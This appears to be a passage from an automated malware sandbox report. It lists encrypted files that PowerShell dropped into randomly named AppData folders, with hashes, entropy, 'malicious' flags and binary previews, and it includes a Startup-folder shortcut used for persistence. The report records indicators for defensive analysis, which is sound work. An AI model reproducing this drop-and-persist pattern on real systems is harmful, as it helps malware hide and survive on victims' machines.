Preview:	b7.......(.W B..L..L...}....F....@...@.8D...]D..KB......A..0.uP.5l.+........6 nJ4i.r.m./..,...+..'..n.J6.{... ...Mz.t.>..J...\|.7...Z..;....B`..8.>..`@.r..Wn...(.`6.....G.a.X.=.Sr.V.R....6...mw...@.pi..K..lS.b..........--.G....3....@..d..W)..!.z....;........Oq..uI#...8....j .2g..S....`...<..K[.W....!e.J....t'....o:JU..ay.+..22..P......G...d-<m......X[......Z[....O..k.......Z..DG-.<...-.H..Sl.P1@....K...Q.Fw......RU..........}^..$OY...54.`..X)..9Y....pM.....iO.^..B.....)$.....#...J..\..%.!..rA.........K1..._.,i/w9b"DK.......{?r...`b.....G..e.2B.m..S6Y.o.8..Yr.n.......Gw.~...M@..U^.k....[.].[a.Z)u..MK.....b..U....;.s..8..}..$.......,...R...4.R.;(9....%h1E.#5>..M..T.d.!U..u.+......-..b.mn.....V..T..P..c....Cp. .9...........&...e.t.]\|?....D...?..z..I...N.....t....v._o_..K..C...,H.Q....^.r......5.\|.7$./.J...wpH.....G<\|....X..X^.BK..h.}}dlN.9k7....,.4..':?....; ..%7.X[......u.....Y1...V.-Q.....w..s....!Q....B......~.q+...`?.6...;.?

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zQNCJPBkutUl.EJgZczDuCSjwnVHs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	162568
Entropy (8bit):	7.998953688706442
Encrypted:	true
SSDEEP:	3072:K5F7/tobdUaIvxCNIEpbzrisc0zBr53o9e4MC7Zxq39imwmxvDVqd2u:gexUaIpC+sc0M9QNicbs2u
MD5:	77497FFB95B6815521D8319918C9B5B4
SHA1:	20E5FA371305C8BE2CB5DAA8B1763E888E0F3BBA
SHA-256:	8E822556684AA63E99A1B51196A671D0B3644CA6A2E06F5428439679699C617A
SHA-512:	D537ED5405C03D70AD025A9F2D949E0D8B958023E6DC987C4966E65D1C19057B7D862F4562381ADDA1F6BA21103C0B6262022A274074033F0241AE8EDF00F5BD
Malicious:	true
Reputation:	unknown
Preview:	&n...%,..`.j.H.,>.J5..$.Y.c"7...p.'.q..c.!...Q.^.M.......5i...s....a!.....s.......8..=.f`2;+{.....W.=J.:z.(6.S'a...).&..n.}.M.9K.&.N..Wop../....i..#..K0.\|...jY..l......2.~.{...l..v.......K.E..=+2<Q....;..SE..cK......&1....y.P..>Z...a&......@ZHL....{(}...}dO..Kp.F.....fz..L]8m.L[.n..s."...f__.U8\|....Z.._..}..\.,..?.../y..i<.%.Y@..../..\ku%..\31xz<A).....K.X..Bb....A1..q..6.~.....5,3......AR...i.....n.'.@A.d..p-.....0.i....f..../.'.."w_.jo.....f.6..N..Y.q.e..\....@`...j!......w..u...0..w..M..FL..V....`...:.Y^~..[..:0#xu...%.ph..!....@iod>F.R.......i%.1]$O.p.I..L<.....G...2.m]..>.9....m.....s..v.m. P.Y......c../.@..Q\..4..g...e...... .....1.\6%gj.d..$!@xO.1..^.1..2_1..(.+.....8..../~.e.f._...+Q....8.v..c].C[...+Av....@..U-.DU..0......5..#..M....?zZ...{.P.y...C.Z.8.9.c...b..!.4..X"1...8..b&4T......R.....'G...i..8...N........(..^.a.G.y....s.\.x..KX...P.K..1.......2.........b.[..{.$..w..o...kW.F.X...F..1.rkL...r..4.4.......C#.-E.+..4.H.P....

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zonHeADUfvIJyuT.jCUqEmOsWvAZG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	144061
Entropy (8bit):	7.99874166519893
Encrypted:	true
SSDEEP:	3072:T0h3FpR7/17FVm+73C0qxnNsUFXdz+glUWfdPsrR+f:wPp7X7vqn3MWxL
MD5:	287930EF58176213A7A6F3D4788EC03A
SHA1:	6707B845089762CE32646AD5445BA7FAADAE8CB0
SHA-256:	27B9FAF40524157E775A73D3DE022FCB9CFCC3571647F6E70709A3A22009BA8E
SHA-512:	5B43E5D84C3FB107C130AF495859ABE30F3998FF48A49908EECAE5CAC40A774712CBEB8A76E2058BC108F6ECE91A1ADE91CFE72BD2287C1501E70F33161FD116
Malicious:	true
Reputation:	unknown
Preview:	... ...f..w_{.5gr.o.......t&r..Nme'.u..O.P.>....;.}.f.2...PPd._.(...>... .........7.j.w.Hi._..]J....<.H...m.4...>.U.t...... x..7 ..r5.....g.ue.!]..'................R6.#.\|.M......R-.3...@.mi...U.....a.Kf......d.....^...X..B....;....".(...J.>1....XB...TJe..!.{<o.....6...........+..6..x.....:.Zb"...["P..O..a.E:.O...y`r...j.vh.p.. ...gbL.V.X4.Bz..Z...P..=r..y.....$d-.KZX......(..}^....8...}.,o.Iu...Rj.Cd.F.,R..+.iu<..T+6.W...mxt9....O..9. .?o.T.........\|.f./....K...V&.Y...j.......k.B....'...v.b$...}^B.....J./..H..o.\...e..SK...:.M...D.........]Y..g....=.I^..>7...;m@+=...y."...il...^4.M1xtD........uv..&/c_.J....!63...............P....8.W.A-.....d.=&\|..@.$.fhP.S.u,3..Z...{..>3")b.)z.+. ......$.1.."..M:..t2F'..a..p.!.\|...7N...S........CT..$B......j@.._.M.n.U..#.."..&^'L.....b.1Yl.`.z^:.d.=.rIt..t."D.~.\.G...$zE[..+....i.!6`.f.Y6(..6.....,.h-...e.X..:.B.....C....<..5.<...rx../.b...U..",N$.N.d.r.}L........qu=..)U.0......#.m.n.TY...aP.

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zwAPanTurp.aJyFLSWvQIHO Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	99472
Entropy (8bit):	7.998376547475255
Encrypted:	true
SSDEEP:	1536:fLhZqT1mwdjNWzoIhb+Un33NosOBjwuCim0Nz2xp7+X4krT+IIKWXN77aQhNoWo:D7IjNIoIhbhlo+0NyxsN+8WXN7viL
MD5:	2EFFFD05752ED92185A1C957942AA635
SHA1:	01EFA1C5150B124B1EC5E48EDC241F2AB5E1AD28
SHA-256:	A161EB680931F8D782E008B71454113D218DFF15B8A4AEC673C37F24022834A0
SHA-512:	7353A62638D4CE8F17DB88B9D86E1E573104EE4A891C8238A976CDC5F86E77481AF8906E22DE9073F0F465413FC0B666D717606BB71CD64F375981927B19F28B
Malicious:	true
Reputation:	unknown
Preview:	<..Y..Y..?.5:...8GM.DI..cm...m..X.P...n..m~...!...b..}..7..e~y.!V.......<l....K..k.hh.......%.]....-....j. ..$.j.0.....Q...F.m.o.....S....=...'}.E...........d...X..d.,.9b8._....d(Vc.$.5!h.>.n}.}$...<..p.:.K..<..<(..4..CZB]:..U..I..'............A.. c...(E..F.<i.].Z.1J..m.Q[<<y.......}..L..hl.B..(.:...=%.[.I..\|P#.r.`.........'......!.(..4..zy2,.h%.r`..-..!...?F.....=........J>...ZM@...).]..4~n...k(e...yOy&...Rs.v.....iK......?....Fp{`.........Qc....lN..8bKl.....6.-.Cr..~.9 ...U...(..(Mo..0..2..-.o... :.B...-H...d.....a........pB:.F)......]:..ii..2[Zs.8.....@uT...$...:......\|=....W.2......?...F...n..\p.\|..0G(pet\.w..5.F...[...H7v.F0.1....q.Y.-v...F*..((A.Q.,$v.mG...x>w@-.^.-"B.M0.~Q..~.H}.E.....%:.p......6.l...FP...x......{.m.....(....?G..m....8c.......M(Qx.2...l.U.8N....I..c......+..^...c{....>...2.,g..n..9I...@.~{F/...{.`$../^.....U..Z..Af..x..d.C.]A.x........$..Az(.......-.&.r .S....P.t...6{...Z;2..0L.B.&y.s....^h..N..Q

C:\Users\user\AppData\Roaming\Microsoft\AzaONdljHpEnf\zyGFSfleNJwnZo.MSbztpYaCAmODWEGP Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	196494
Entropy (8bit):	7.999066964282524
Encrypted:	true
SSDEEP:	3072:mYmJooY4HT5APBU2es+vmKy5p2LLW7W/KFH7v+ixz0pVwi5Z5qy7aGRj/r7UVAW:mYmJ64HEBU2esig54LLW76waGgpeGZ5q
MD5:	6D8C54A1500C715ED41C5DD5748162EB
SHA1:	D076C273DD9A32B084FC9BF121814C43EF4DE325
SHA-256:	A1881CC6536DD7E5199C2C62775D4CA5E1E8641C155D61C0816256ECDEF212B3
SHA-512:	33743A40BBE896A235060E463A3351BF70F3E8806D1CAD9A4BE666EA29783B026D7924F55AD60A2F9F9FC2199E4CB58DD03C992E719BC71AA176F45472B7E1E6
Malicious:	true
Reputation:	unknown
Preview:	.u.rD.Y.K....N..xF..;Wo)....n.Mb.j..V..=......X....G...t.ro._!.Z.t...1.^3.sG^.(..Q....vxi.Ry.....ci.r..F.....rJ.(..q..a&?Aea.=...1.d.jg/b....SY...Z.....Ca0..a.:..nA.<:.iAO.D/...Y.q`..._.!.9..2.C......Ak....Bz1Td.^.......N.`.....q.........gr....0.7...a.2g.\&.9.Z.-z.H.... +..Wb.................HN[.<..u.z.......J.A....W..$.(@....)...{.C...#?s...P...P.P0Q...&.....w......q....<...1;.{..b...f....^).5.MrzP..T..#B.p..L..>f.A.......".k~...)V...xf."....`..i.1....7'CJ...M}Or.q0f..b....xT.....$....-FL...\..\...gO....C....Z.RM..Y....r......@.=o.,.1..\z..eg.Q.~kt..2...!....I..6.!S@(.7?.....}..y...{.....9B.y.I0f0V>C\|O...dF.=..Ztze.(y.......5.[..q.:..g...Wk...6L...>...]R......&.T..l.\|=.A"....0.wO...f...T1...uu.-!/. ..\|...s..o.s.M.[.\|....v....i..../.}.I..k...(....s.........ga%.tC.3.E9}.(....\.iM......E....`s+..C..q....U..'....M..0....cyU.j]0.......(/..0.oL.h......y............r......=.....a0.'nu....P.xd.v.j.k\|t......u*..^V...(.....`..D\V....!.z... ...

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy) Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5343
Entropy (8bit):	3.9944664902642697
Encrypted:	false
SSDEEP:	48:igiRhZCZhgeC0TMCfoRj4Iut0VvoS8ObUSogZoB81voS8ObUSogZoBYH:5gCZrCCMCwRgtstRHyEtRHyQ
MD5:	97312FB14EE9FEA968E466BBA4916545
SHA1:	4BC7F5A30E8A0AEAE1E31E4F33CFCF8A34A4EC7D
SHA-256:	82906E9DC34BC6F52B3267335333A6D03245CB19F0F59EBBD885E8512A7224A7
SHA-512:	5002E1ACBE68A83379B0595A34FEDD45420F78F1ED5A37D5C6FBD92AC59A904B189B3E02882F3E0A1BB1A67B151CFBF9FD1D8EBE6A6B16A8CBF77D03A3802DB8
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ...d.!.......!..........F.........................:..DG..Yr?.D..U..k0.&...&...........-....y......!.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..S.8.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......S.8..Roaming.@.......Ny..S.8.....Y......................\|.R.o.a.m.i.n.g.....\.1......S.8..MICROS~1..D.......Ny..S.8.....Y.....................i!.M.i.c.r.o.s.o.f.t.....V.1.....>Qxx..Windows.@.......Ny..S.8.....Y....................4u..W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..S.8.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..S.8.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1......S.8..Startup.h.......N{..S.8...................>.........S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.......2.F....S.8 .A65A7A~1.LNK..t.......S.8.S.8

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\XTMSZFERGDZ37HDECF8V.temp Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	5343
Entropy (8bit):	3.9944664902642697
Encrypted:	false
SSDEEP:	48:igiRhZCZhgeC0TMCfoRj4Iut0VvoS8ObUSogZoB81voS8ObUSogZoBYH:5gCZrCCMCwRgtstRHyEtRHyQ
MD5:	97312FB14EE9FEA968E466BBA4916545
SHA1:	4BC7F5A30E8A0AEAE1E31E4F33CFCF8A34A4EC7D
SHA-256:	82906E9DC34BC6F52B3267335333A6D03245CB19F0F59EBBD885E8512A7224A7
SHA-512:	5002E1ACBE68A83379B0595A34FEDD45420F78F1ED5A37D5C6FBD92AC59A904B189B3E02882F3E0A1BB1A67B151CFBF9FD1D8EBE6A6B16A8CBF77D03A3802DB8
Malicious:	false
Reputation:	unknown
Preview:	...................................FL..................F. .. ...d.!.......!..........F.........................:..DG..Yr?.D..U..k0.&...&...........-....y......!.......t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..S.8.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......S.8..Roaming.@.......Ny..S.8.....Y......................\|.R.o.a.m.i.n.g.....\.1......S.8..MICROS~1..D.......Ny..S.8.....Y.....................i!.M.i.c.r.o.s.o.f.t.....V.1.....>Qxx..Windows.@.......Ny..S.8.....Y....................4u..W.i.n.d.o.w.s.......1......N{...STARTM~1..n.......Ny..S.8.....Y..............D.......0.S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1......P.q..Programs..j.......Ny..S.8.....Y..............@........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....~.1......S.8..Startup.h.......N{..S.8...................>.........S.t.a.r.t.u.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.7.......2.F....S.8 .A65A7A~1.LNK..t.......S.8.S.8

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a65a7aeb5fe4978dc705b96d177e7.LNK Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Sat Aug 28 06:05:14 2021, mtime=Sat Aug 28 06:05:14 2021, atime=Sat Aug 28 06:05:14 2021, length=60346, window=hidenormalshowminimized
Category:	dropped
Size (bytes):	1119
Entropy (8bit):	5.095138271099511
Encrypted:	false
SSDEEP:	24:8ZCgl0FjoR04nIN2//1s5l8AvIu/s81ADs5ljmbo:8ZCgehi5IY/AJvIuUyA+pio
MD5:	A98AE90444BBE8E98AB1B3EC6430E590
SHA1:	655EA43EC7FE1C803F3F380AA31C43C31D5A92B6
SHA-256:	88BAA0A80C43E03896C82BB01CD0DD3C509F6D34FE75B83846E53CCDF3E66267
SHA-512:	C4FC811941DC1CFA5639528848D1BB10B69D8E3B07D5E7F80FA6CDC587C71BAF0D25271668F12BBA3390718BF88362B58233FB7BC60FEB0D7D565D7BD0ACEC8E
Malicious:	false
Reputation:	unknown
Preview:	L..................F.... .............................................f.:..DG..Yr?.D..U..k0.&...&...........-....y.....p1........t...CFSF..1......Nz...AppData...t.Y^...H.g.3..(.....gVA.G..k...@.......Ny..S.8.....Y....................f.(.A.p.p.D.a.t.a...B.V.1......S.8..Roaming.@.......Ny..S.8.....Y.....................`).R.o.a.m.i.n.g.....\.1......S.8..MICROS~1..D.......Ny..S.8.....Y.....................i!.M.i.c.r.o.s.o.f.t.....n.1......S.8..DTHWUG~1..V.......S.8.S.8............................Q.d.t.H.w.U.G.M.V.p.N.u.B.r.l.W.F.z.j.......2......S.8 .WDEYZL~1.VIW..l.......S.8.S.8..........................k..W.D.E.y.z.L.q.k.C.M...v.I.W.L.Z.J.T.U.Q.e.X.w.o.B.d.b.j.z.......................-....................R2E.....C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\WDEyzLqkCM.vIWLZJTUQeXwoBdbjz..<.....\.....\.....\.....\.d.t.H.w.U.G.M.V.p.N.u.B.r.l.W.F.z.j.\.W.D.E.y.z.L.q.k.C.M...v.I.W.L.Z.J.T.U.Q.e.X.w.o.B.d.b.j.z.E.......9...1SPS..mD..pH.H@..=x.....h....H......K*

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\ANMXKZWCdjgmtP.VdvbMKlBGZ Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	65187
Entropy (8bit):	7.997317360753572
Encrypted:	true
SSDEEP:	1536:ECEUZe6qjgBYmpGoTc8ZgaPDROBZ7/1c183sTYsv/GFEO:lZeTjgUoTDOaPNOHjQossw/CEO
MD5:	9463D93AE0EC2C12ABDF727E5EFD7F73
SHA1:	52659308EBB749B4999847A69532B3BA8B8F4BE6
SHA-256:	0F23EE93B067F06D31E04FD72E9C1729A1E94EC62682FF30A74420CD11534426
SHA-512:	63C407EFAFC0D141C38C2BACEF31B29A3005C9FCF43400CDBF01D06534474523B2715A58F479D83EFD547EDB7B60D4A6BAFCADE16FCE7F0CE605EA5406111F2E
Malicious:	false
Reputation:	unknown
Preview:	...A.C..4..1E?g...\'....2....E.z...0.lIz.....(N...Y}Q....B.....T..7.Ha.9; ....=...)..%D\|...............o..........+....C.Z3D] ....P....UqVW.-v ...&..2z...;.)......p.q. ...R..S.%.C.C..IN~.H.]...Q>S.P)e...F=.(,..-...........?.....DT{...w.v.qU.../.......5.:..Cx.f.K4..,<..=........!..c...n..2...m.~F....b...g...&..i.....7.c..Bp......<pLJBH.K.R......b....v.M.W.C..k.5OQ;..d..o.{...=w(6...K....p.a.....h~b.~..h..Y.....#...._y.D..8B.....Q.0.$D....&e.).J..z:.................@Uo.....a.t...Y".P,.z..Ek=..qk.9...a...i.H[.6.x9..nyy.}.x...$.,..t.......s...d.2 K...k...T..E...<.,~..a.....s..>g....Y...1-..S(.....1.^e....\|r>mK.._.q$...z0.B._..m..[5.~..:..B...7+..R.~..].-..~...9R.......)..=..u.#z.!w.jQ....#...mG...=.....u....4+.1x.D....]..U.....;=..Q...`.?..]]d.;...W>.er$.Yl..AR...../^.}.p..\|m......._>a..Mpd.f9G[.i'(....+g.^.}A..<3..\(;.8.B.:.5..Z..a......uP."-m..[G...US...K.#Y.....I/7....p.!..L......!HH)l..C.".m^..@j.i.$.....o....cR'...\|IV,9..Is......

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\AjBICNDlUaPKYotmuz.DLlSIFYzMVGyfOxsNa Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	153162
Entropy (8bit):	7.99870408279692
Encrypted:	true
SSDEEP:	3072:7R1SgYQCo9o1G3U4bbSlQn3P79XgWZ5K1m/2/A4bjCnmpu:T4o61G3bbbSG2ks1m+IOTu
MD5:	BEFE576FDE46EE366098A800A626E87A
SHA1:	856937BA40E9A25EC541148EACEDE30C7AC6D74B
SHA-256:	33F4882F06775FBCED5C577AC7BA8D2A947F4E1B7249ADFE2A501DEFFA744D5E
SHA-512:	D32BFEDE25FD6DF432824AB3F862E0FB3CDEF5734EBBFA7E5EB6A7490F6CEEE48AD1A398C39AEE92BC7CCF68FAB3E51E8B0D0CCC3BA07523FBFAA4FA3BBA77C3
Malicious:	true
Reputation:	unknown
Preview:	.h-..8."V.]e......=.%u...s.g.t..8..]...t.........>...N.8..p(....\|....;-.95....Y.{..5SN..e%...K59'.4...%d.Ya\|..Y..{...T...>.o.....S.K...^..%......#.(..e.o....t.t}m....hN...3A.O...lN.....hn...1w......P...2.gT...]&...)L..y.&}..\|...e...31_..../....Q....?....i&/..,oz.)qz{v@..I..c/x...Q%..&A.8........&(uZz.....I...U.r.I...0.B./zL._...P...3&Q..A~u....-.N.j%E.8+.!.....16..":.j.4.p..J}.8....k.V/y...u.].._.,..Vtj.0gJf..OZ.[.b...3.NxW.A/;.....o...N&..N.2%/V/..p`.......8.Hb\|zz..aQ.B.g.E1...,!&..Wj\|..z7...C....W.......^....8.';.s#-Z.s.m..ad...,.....z.....^4W=...7....'HN.;.&\..D.3..P`=/hx9[..\.Mq...^...3.#..E]..<..>A0.a...}...\|..:.7Ct<Y.....2..F.../k.."<...#...`..$`....9.Gq...w......6...^.....M'.*..G.RT8.goR.&T.5U...Dh.z...;Y$...l...2Z..$.xnc...K.\|.5W.I...B.T..>\|K...Y..ns..y.,.?W. ya[..OM.....;....l.H.;.......u.p....8...J...L.f..@.9U1y 8.\|W7.4.b.!....b@.1s.g...........c4.R...D.8E..zs..4G.nm....K.G+..Zb..x..}TL.Zu..^Y#..E.FG}.......&&.+...w.,s..@.&.@l..<....H

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\ArMPXIlnsVEh.xSXIjsVucAJRwqoNfb Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	141582
Entropy (8bit):	7.998760321642379
Encrypted:	true
SSDEEP:	3072:ObDXzY1gLAj5m8jeYJVtva+cw5X2GQ3h1rQTH1XhgfzyJ59bGzZ3:ObA1pNJjnnl/Q3h1oH1Xh8m2Z3
MD5:	38ABDD27160F97639A1A7A876E5CF3B7
SHA1:	F33562C3D4FF93F6C9AD4C4CCD57661F35470074
SHA-256:	32BD0F67C8D0D8D5BBE015345A31932D989DB1036BE5159DCAEB370A50308B10
SHA-512:	D767C187A0AC71980E598305E4489896C75A02DE5168B0083BF8476C862CDEC64F8009DACA612A942E600B0E807CCC16AE4F17A320303A27FE6E2352CC84FE6D
Malicious:	false
Reputation:	unknown
Preview:	EFP.<.......%.@..B_.....Y...U.k.?..E.7.y./..B....-\|.......S.^..:t.(P...+.k5.?.H.=....V....21u..X@_..e..`..UV..r.\|Gz.'..\|o/...k.X....a..a.H.V.\r...Gb-1#.7m6..f.9...w...../v.%..%.is....z$..z.J..Z...7.....N&..d........d.'...+.....).{.."..,..k...Mw.T%.......y..IG.K......:..g(...s..v.P.i.N.-j..l..WX..\p...k......i........r......;C...a..{...._'..(.....'..Kj.-.SQ.)."........ . lukb.w../..Q.k.<....O@..X7..{J-....~<.D1P..H.G.....O\|.5.JV?...G.D..2...M.\|.D..u.nN.:..U...r.9..Z...N...=....,{.O&...........Bc.8.,.c.Ye.U...u.#....?}.....>b.a.5#.E....n..kw..T....M. ]v......R..u..J.....rG....y.b.......u.......h..n[..s...X....c...z.Z.\|..d..........5.g.Y.H%.'N....V...K3.>..f...T.\a...J.~.x..r&8....'7.&....-].W..<.WN...T.mV.`.-.6Si!5*k\|...\..a}..le....dB..5..-'....3.KW).....3......Cb.).......s...e..?.P.l.V.1.V.i.YL./3.........#...\|....._)9......k.[a.h....SX.=........3M]..55'\|x......+lx0izK....j/.X.....Q....W../..sJX....Z.7)....>..Zr..p...\q`..j..B

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\BcAUNXMaQh.lfIaJdDsNAZgpkbME Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	90070
Entropy (8bit):	7.997873825373466
Encrypted:	true
SSDEEP:	1536:yUf5AEZEJy8R0mz3zvDXYwSryE55zkO9JV/hlUWngNZZAYc715mTpKsve/J4EZ:l5AEZ3hYzDXsrXz5fNzmZAYceteBZZ
MD5:	A76702DB99269FE7DC6A8E4F6ACAE885
SHA1:	8547E3DBAE9C34EC095C78152F42B26BB0DE8EFA
SHA-256:	72648C70CEE77D9C98E6AEC5D31C463329C6A24527CF21DC731757BDCDAF1A64
SHA-512:	E1F7FBA819C5544BD79E20475752186A739D87B101EC25B9328C736346996BE48D01FD4FE8E078B6242EA6856DED540182C622E264C5DC24DA4BFAF569C070A4
Malicious:	false
Reputation:	unknown
Preview:	Nl ...W...[...@R.-g.......~..D......l.^U...o.5.......>..Oo5.....=.e...! .8j.d".7. ..~..X)\|.2.Y?......v.v....s}....@......6..F..+.ul...$....S...=6.c..C....../.8.......Y."..]-Y..E{-.1g...;.p..z....#...-....)\|......`.1.z..&>y#..o.KV......x......=....gD.U.B.Z.2D.a.;%..3......p......$.....p......Qm.....p.dP...2..m.Ky.}.~..x........1..Yb~....>'n.&:$..Z..Fa...r4../.;.^.8..s.[P.5.S...Ial..`..O....6.s...}.k.Q....I.....X.}.......M...w.!.`........4..\...E...E...8..i.q....kM..I..V.\....o../..TS.+R-~\|g...e..?..po.\..i..-..._.....X.Df.$-.`..O..bq)..w.:.)....9d8.6....=.<#D..Dg2z....W...<....{.~...c.{...T>m..V.\+.+4"B.....P..IO........G.V.E.uPHR..O...a-..v...X..^..:dc..1b\|...w.I.YP.g.d..!......\.a...e`..'.....e~..v\|...G.....+0 .n.o~=..".0..).......7...m?b>..7...Y.8c.gC.....X.;.6.a..1..~o.)..i......}..n...[&....g....o^...\|:.%...A..WS.tu...#I!..#...._.Su./@4...XD.6.P.jk.w.sq6ieGj$....D..V.3@.......S...........AO....n.y7.\.1..64z..n..XS.(.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\CNhOgmPbvFos.tCQvUSpIZHPVTYEG Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	72428
Entropy (8bit):	7.997385350809916
Encrypted:	true
SSDEEP:	1536:GySCAGTh/vUEcqXGMpS+XCog5S1U2rAuvj76UeX8ajYWmoWtZh:GySrIpsEcq/pS+XCPopAuvj7JeXt0v3x
MD5:	49ADDD90F2152BBC734FC6D4722A8131
SHA1:	31685D36E754C3829E5BBD66D442FCEB24003B3E
SHA-256:	AB4C1A704DEC3EC782E4FBFF2E41D9C330A42F259EAE12D3123B420DF3A4C4CE
SHA-512:	ECC2A3EF5771B443A5D26820480C0AC0F16FBEBE6F31FB0AE7317AD6D6D8B8C616C383F4DE252791BCCB827B9D2EDB6AAADD293EBE902141D9D98EAFC7C3BAD5
Malicious:	false
Reputation:	unknown
Preview:	..Xj.f)G@91..V..l~..=.,2.~........O...w..p.....}9....E..%NX.XB.C........d..^F5..T..1.mU......W.^..X^.e......w...S...!..W.K.l._.O.rits....zGp......H..7h.._V....EMO.a.Ax..!Bz...kl.>.JH.;..f{u.....#:..g.p....6%f.U....~.a...bW.[.........8.F.g@...0-.....P.....%.3.a.\....!.n.O....hk-...{i.J.......k...K..QM..s.&7O.k[.......GWM..p.\|.p....S..g2X../1@..#.Nl........6....YVg..%.?...S.....Z.I.s!O.1.!..PU.(q..XF.t...u#....5.Z.4...O<...........~..Xgu.2...t.\B<....V-..wD....3...X....T...Y:..U:)m..daSN..T....U...`....9.z..=.\....Y$;..b...}.]....I....E.....=&.................<.8oo..C....a.....E...b.... ....4V.H.......CZJ:&......{..u.......C.y.V.......y.m.\X..}.... ...>.N..5<._\!.....T.B.jz.^.w..?6.J.H.P..8.............#..>..).~76.......... ...oi......`3p.'..)....HA...BX.t.....~.!JR%W......\...&(.h._BoC.w....x....#.)....U.,)\.........1@...(8P27@.>.....J...y.y....AQ.F..........X.4.>U...1.&U.8Zu......)..P...!.D..ktM_.....9^..\|z0k.....#.....Bz..,t...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\CcXuzVtZviY.ZURkIGVlPojtgs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	163923
Entropy (8bit):	7.9989020978163685
Encrypted:	true
SSDEEP:	3072:O7h/BqF1LTvh51vsvM9+23oP/y+hXe8vuli29EecfUUSkcGNNfgZW:KBsdnyW+2Bgj2iecfKGNNIZW
MD5:	FC72DB8BEF77D2A06E4FA444CD00E880
SHA1:	B8963E1A3EBC281B7787C777984A125447C85BDF
SHA-256:	D445DC67030030A7AB36DA6F36F6B17F6D5D2DECE4C485491CA5CBAFDB36B203
SHA-512:	1313B053F850F49B7B9D1CD3A46FAF1F9C8F9236BAE4FC5863BB540A6F67204E16EE7DC3FCBFD916B5B91BC3940EA34829245A50DE2858355CAD1668031080B4
Malicious:	true
Reputation:	unknown
Preview:	....]..+L....D.6.k&..rg..W....(YA=..h..QF....o}D..$..ci....'IE.)...<xW+s~...C..0.2..nA.'.OK7.ZFB];h..X..w.......h..~.R,"....;_s...l......E.T.U.N.C...;..f..<! ...lH}.=.t......].0..D.D..r".$.>0.:....O.WT./\..Ox...t............."....eM.D...3k&4.!."6..:C..e.~..A.3...s.y.lQ..R...b.........]...7Pn...."...w7..~Je..8R.0.}...f#..fz..o..H.k.gYMYG.-;......0.l.ea.........k$,#C\_..t.f}...?.\<P....-s..7...a-.......k..j.^y.....Ka$.......V.YZ.2.L...h....A....\..jq.&...+....L..;$...}..c.<.F....C.O%......#..=D7\|...5R.9p....xX..X.....@s..@.=............=....9.^...eQ2..U..ke.>C.7N@...,u-....IEMjD{BP....._TI...x....a.$1Q.+..A....A.....u...%.N`]..P....d.om..5.......7..Jy,).M..U.....&(w.....R...p..:....8......N....../F.e./).........:..X.t...2a..U..,?^Wi...3).... .._l..C.Z.z.1.=N....J{...{.ll....}dg...R.#S._..o...S.>PF....p$..}....CYt.kc.I...4....-..s.E...e...+......H.,T.;m:h........>.c_.9.UvF'2...@..og..c.+.A..........!~.c.$.F...+R-fa^>.i.4...

